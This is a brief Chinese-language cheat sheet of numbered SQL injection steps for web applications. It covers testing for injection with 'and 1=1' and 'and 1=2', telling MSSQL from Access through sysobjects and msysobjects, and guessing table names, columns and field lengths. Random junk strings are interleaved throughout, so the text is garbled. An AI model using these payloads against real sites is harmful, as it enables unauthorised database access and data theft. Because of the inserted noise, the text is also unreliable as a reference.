1.判断是否有注入;and 1=1 ;and 1=2 yfS`g-j{~
2.初步判断是否是mssql ;and user>0 ; 4E0%@R
1.]Py" @:
3.注入参数是字符'and [查询条件] and ''=' $/%|0tQ
jUq^$+N
4.搜索时没过滤参数的'and [查询条件] and '%25'=' /@5X0m
=N,Mmz%
5.判断数据库系统 So*Q8`"-.
LI[ w?6B
;and (select count(*) from sysobjects)>0 mssql A*BIudli
I=VPw5"E
;and (select count(*) from msysobjects)>0 access k`W.tMo
}LNpr
.(tga&]
S1pikwB
6.猜数据库 ;and (select Count(*) from [数据库名])>0 gqaENU>
P`HE3?r
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 -Cxk#-sb#
n&=3Knbd@d
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 zrjqB3R4@O
!<